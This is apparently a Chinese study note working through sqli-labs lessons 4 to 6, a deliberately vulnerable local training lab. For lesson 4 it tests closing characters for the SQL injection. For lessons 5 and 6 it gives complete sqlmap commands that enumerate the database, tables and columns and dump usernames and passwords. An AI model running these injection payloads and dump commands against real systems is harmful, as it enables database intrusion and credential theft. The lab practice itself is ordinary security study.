sqli-labs-master(4-6)
用’ ‘’ ‘) ‘’)
特别注意:这里的’'不是两个单引号,而是双引号
虽然输入两个单引号和一个双引号看起来一样,但是意义不一样
四个闭合试过之后,当")时候,
and 1=1 不报错
and1=2 报错
另一种判断方法,输入?id=1…
输出 ‘“1…”) LIMIT 0,1’
所以说只要1")然后后面会多出来’'),用-- -注释掉,这样就闭合成功了
回显点2和3
pass-05
没有回显点,一看就是盲注
进入c盘,进入python27,上面输入cmd,终端界面输入python.exe,将sqlmap.py拖到python.exe后面,输入-u
然后
C:\Python27>C:\Python27\python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-5/?id=1" --batch --current-db
爆出库名security
爆表
C:\Python27>C:\Python27\python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-5/?id=1" --batch -D security --tables
爆列
C:\Python27>C:\Python27\python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-5/?id=1" --batch -D security -T users --columns
爆字段
C:\Python27>C:\Python27\python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-5/?id=1" --batch -D security -T users -C "id,password,username" --dump
pass-06
没有回显,所以还是盲注
跟上面一样
C:\Python27>python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-6/?id=1" --batch --current-db
C:\Python27>python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-6/?id=1" --batch -D security --tables
C:\Python27>python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-6/?id=1" --batch -D security -T users --columns
C:\Python27>python.exe F:\工具\sql注入\sqlmap\sqlmap\sqlmap.py -u "127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-6/?id=1" --batch -D security -T users -C "id,password,username" --dump